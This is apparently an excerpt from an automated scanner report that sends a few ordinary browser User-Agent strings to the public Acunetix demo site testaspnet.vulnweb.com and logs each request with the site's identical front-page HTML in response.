Attack	Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3739.0 Safari/537.36 Edg/75.0.109.0
Evidence
Show / hide Request and Response
Request Header - size: 453 bytes.	GET http://testaspnet.vulnweb.com/ HTTP/1.1 Host: testaspnet.vulnweb.com user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3739.0 Safari/537.36 Edg/75.0.109.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Connection: keep-alive Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 0 bytes.
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:51:16 GMT Content-Length: 14066
Response Body - size: 14,066 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgICAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkZArjxDMCoNA8/4bzlRmUHIna4LG5" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLpus/wCAL+kPzjAQLQp5LlBAKx0tH6DwKx0tH6DwKx0sWRBwKx0sWRBwKx0rn5BQKx0rn5BQKx0q2cDQKx0q2cDQKK+b8FAor5vwUCivnT2QkCivnT2QkCivnH/AICivnH/AICivn7kwoCivn7kwoCivnvtgMCivnvtgMCivmDzQwCivmDzQwCivm34AUCivm34AUCivmrhw0Civmrhw0Civmf7AsCivmf7AsCivmzgwMCivmzgwMCv5P/xAkCv5P/xAkCv5OTmwECv5OTmwECv5OHvgoCv5OHvgoCv5O71QMCv5O71QMCv5Ov6AwCv5Ov6AwCv5PDjAQCv5PDjAQCv5P3ow0Cv5P3ow0Cv5PrxgYCv5PrxgYCv5PfrwMCv5PfrwMCv5PzwgwCv5PzwgwCkLrd6w8CkLrd6w8CkLrxjgcCkLrxjgcCkLrlJQKQuuUlApC6mfgJApC6mfgJApC6jZ8BApC6jZ8BApC6obIKApC6obIKApC61dYDApC61dYDApC6ye0MApC6ye0MApC6vdUJApC6vdUJApC60ekCApC60ekCAtfZkJ4HAtfZkJ4HAtfZhDUC19mENQLX2bjICQLX2bjICQLX2azvAgLX2azvAgLX2cCDCgLX2cCDCgLX2fSmAwLX2fSmAwLX2ej9DALX2ej9DALX2ZyQBALX2ZyQBOTh8PekaV12ulQ7L2d+yr9JWRLj" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> <DIV class="NewsDate">posted by <strong>admin </strong> on 5/16/2019 12:32:30 PM <a href="Comments.aspx?id=0" class="NewsOperation">(83) comments</a></DIV><a href="ReadNews.aspx?id=0&NewsAd=ads/def.html" class="NewsTitle">Acunetix Vulnerability Scanner Now With Network Security Scans</a><DIV class="NewsShort">Seamless OpenVAS integration now also available on Windows and Linux</DIV><DIV class="NewsDate">posted by <strong>admin </strong> on 11/8/2005 11:37:35 AM <a href="Comments.aspx?id=3" class="NewsOperation">add comments</a></DIV><a href="ReadNews.aspx?id=3&NewsAd=ads/def.html" class="NewsTitle">Acunetix Web Vulnerability Scanner beta released!</a><DIV class="NewsShort">26 January 2005 - A beta version of Acunetix Web Vulnerability Scanner has been released today. The beta is available for download at http://www.acunetix.com/download/.</DIV><DIV class="NewsDate">posted by <strong>admin </strong> on 11/8/2005 11:35:22 AM <a href="Comments.aspx?id=2" class="NewsOperation">(31) comments</a></DIV><a href="ReadNews.aspx?id=2&NewsAd=ads/def.html" class="NewsTitle">Web attacks - can your web applications withstand the force?</a><DIV class="NewsShort">21 July 2005 - Start-up company Acunetix released Acunetix Web Vulnerability Scanner: a tool to automatically audit website security. Acunetix Web Vulnerability Scanner 2 crawls an entire website, launches popular web attacks (SQL Injection etc.) and identifies vulnerabilities that need to be fixed.</DIV></TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8340')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">December 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8401')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8366')" style="color:Black" title="November 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8367')" style="color:Black" title="November 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8368')" style="color:Black" title="November 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8369')" style="color:Black" title="November 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8370')" style="color:Black" title="December 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8371')" style="color:Black" title="December 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8372')" style="color:Black" title="December 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8373')" style="color:Black" title="December 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8374')" style="color:Black" title="December 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8375')" style="color:Black" title="December 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8376')" style="color:Black" title="December 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8377')" style="color:Black" title="December 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8378')" style="color:Black" title="December 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8379')" style="color:Black" title="December 10">10</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8380')" style="color:Black" title="December 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8381')" style="color:Black" title="December 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8382')" style="color:Black" title="December 13">13</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8383')" style="color:Black" title="December 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8384')" style="color:Black" title="December 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8385')" style="color:Black" title="December 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8386')" style="color:Black" title="December 17">17</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8387')" style="color:Black" title="December 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8388')" style="color:Black" title="December 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8389')" style="color:Black" title="December 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8390')" style="color:Black" title="December 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8391')" style="color:Black" title="December 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8392')" style="color:Black" title="December 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8393')" style="color:Black" title="December 24">24</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8394')" style="color:Black" title="December 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8395')" style="color:Black" title="December 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8396')" style="color:Black" title="December 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8397')" style="color:Black" title="December 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8398')" style="color:Black" title="December 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8399')" style="color:Black" title="December 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8400')" style="color:Black" title="December 31">31</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8401')" style="color:Black" title="January 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8402')" style="color:Black" title="January 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8403')" style="color:Black" title="January 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8404')" style="color:Black" title="January 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8405')" style="color:Black" title="January 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8406')" style="color:Black" title="January 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8407')" style="color:Black" title="January 07">7</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/
Method	GET
Parameter	Header User-Agent
Attack	Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36
Evidence
Show / hide Request and Response
Request Header - size: 440 bytes.	GET http://testaspnet.vulnweb.com/ HTTP/1.1 Host: testaspnet.vulnweb.com user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Connection: keep-alive Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 0 bytes.
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:51:18 GMT Content-Length: 14066
Response Body - size: 14,066 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgICAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkZArjxDMCoNA8/4bzlRmUHIna4LG5" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLpus/wCAL+kPzjAQLQp5LlBAKx0tH6DwKx0tH6DwKx0sWRBwKx0sWRBwKx0rn5BQKx0rn5BQKx0q2cDQKx0q2cDQKK+b8FAor5vwUCivnT2QkCivnT2QkCivnH/AICivnH/AICivn7kwoCivn7kwoCivnvtgMCivnvtgMCivmDzQwCivmDzQwCivm34AUCivm34AUCivmrhw0Civmrhw0Civmf7AsCivmf7AsCivmzgwMCivmzgwMCv5P/xAkCv5P/xAkCv5OTmwECv5OTmwECv5OHvgoCv5OHvgoCv5O71QMCv5O71QMCv5Ov6AwCv5Ov6AwCv5PDjAQCv5PDjAQCv5P3ow0Cv5P3ow0Cv5PrxgYCv5PrxgYCv5PfrwMCv5PfrwMCv5PzwgwCv5PzwgwCkLrd6w8CkLrd6w8CkLrxjgcCkLrxjgcCkLrlJQKQuuUlApC6mfgJApC6mfgJApC6jZ8BApC6jZ8BApC6obIKApC6obIKApC61dYDApC61dYDApC6ye0MApC6ye0MApC6vdUJApC6vdUJApC60ekCApC60ekCAtfZkJ4HAtfZkJ4HAtfZhDUC19mENQLX2bjICQLX2bjICQLX2azvAgLX2azvAgLX2cCDCgLX2cCDCgLX2fSmAwLX2fSmAwLX2ej9DALX2ej9DALX2ZyQBALX2ZyQBOTh8PekaV12ulQ7L2d+yr9JWRLj" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> <DIV class="NewsDate">posted by <strong>admin </strong> on 5/16/2019 12:32:30 PM <a href="Comments.aspx?id=0" class="NewsOperation">(83) comments</a></DIV><a href="ReadNews.aspx?id=0&NewsAd=ads/def.html" class="NewsTitle">Acunetix Vulnerability Scanner Now With Network Security Scans</a><DIV class="NewsShort">Seamless OpenVAS integration now also available on Windows and Linux</DIV><DIV class="NewsDate">posted by <strong>admin </strong> on 11/8/2005 11:37:35 AM <a href="Comments.aspx?id=3" class="NewsOperation">add comments</a></DIV><a href="ReadNews.aspx?id=3&NewsAd=ads/def.html" class="NewsTitle">Acunetix Web Vulnerability Scanner beta released!</a><DIV class="NewsShort">26 January 2005 - A beta version of Acunetix Web Vulnerability Scanner has been released today. The beta is available for download at http://www.acunetix.com/download/.</DIV><DIV class="NewsDate">posted by <strong>admin </strong> on 11/8/2005 11:35:22 AM <a href="Comments.aspx?id=2" class="NewsOperation">(31) comments</a></DIV><a href="ReadNews.aspx?id=2&NewsAd=ads/def.html" class="NewsTitle">Web attacks - can your web applications withstand the force?</a><DIV class="NewsShort">21 July 2005 - Start-up company Acunetix released Acunetix Web Vulnerability Scanner: a tool to automatically audit website security. Acunetix Web Vulnerability Scanner 2 crawls an entire website, launches popular web attacks (SQL Injection etc.) and identifies vulnerabilities that need to be fixed.</DIV></TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8340')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">December 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8401')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8366')" style="color:Black" title="November 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8367')" style="color:Black" title="November 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8368')" style="color:Black" title="November 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8369')" style="color:Black" title="November 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8370')" style="color:Black" title="December 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8371')" style="color:Black" title="December 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8372')" style="color:Black" title="December 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8373')" style="color:Black" title="December 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8374')" style="color:Black" title="December 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8375')" style="color:Black" title="December 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8376')" style="color:Black" title="December 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8377')" style="color:Black" title="December 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8378')" style="color:Black" title="December 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8379')" style="color:Black" title="December 10">10</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8380')" style="color:Black" title="December 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8381')" style="color:Black" title="December 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8382')" style="color:Black" title="December 13">13</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8383')" style="color:Black" title="December 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8384')" style="color:Black" title="December 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8385')" style="color:Black" title="December 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8386')" style="color:Black" title="December 17">17</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8387')" style="color:Black" title="December 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8388')" style="color:Black" title="December 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8389')" style="color:Black" title="December 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8390')" style="color:Black" title="December 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8391')" style="color:Black" title="December 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8392')" style="color:Black" title="December 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8393')" style="color:Black" title="December 24">24</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8394')" style="color:Black" title="December 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8395')" style="color:Black" title="December 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8396')" style="color:Black" title="December 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8397')" style="color:Black" title="December 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8398')" style="color:Black" title="December 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8399')" style="color:Black" title="December 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8400')" style="color:Black" title="December 31">31</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8401')" style="color:Black" title="January 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8402')" style="color:Black" title="January 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8403')" style="color:Black" title="January 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8404')" style="color:Black" title="January 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8405')" style="color:Black" title="January 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8406')" style="color:Black" title="January 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8407')" style="color:Black" title="January 07">7</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/
Method	GET
Parameter	Header User-Agent
Attack	Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:93.0) Gecko/20100101 Firefox/91.0
Evidence
Show / hide Request and Response
Request Header - size: 403 bytes.	GET http://testaspnet.vulnweb.com/ HTTP/1.1 Host: testaspnet.vulnweb.com user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:93.0) Gecko/20100101 Firefox/91.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Connection: keep-alive Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 0 bytes.
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:51:18 GMT Content-Length: 14066
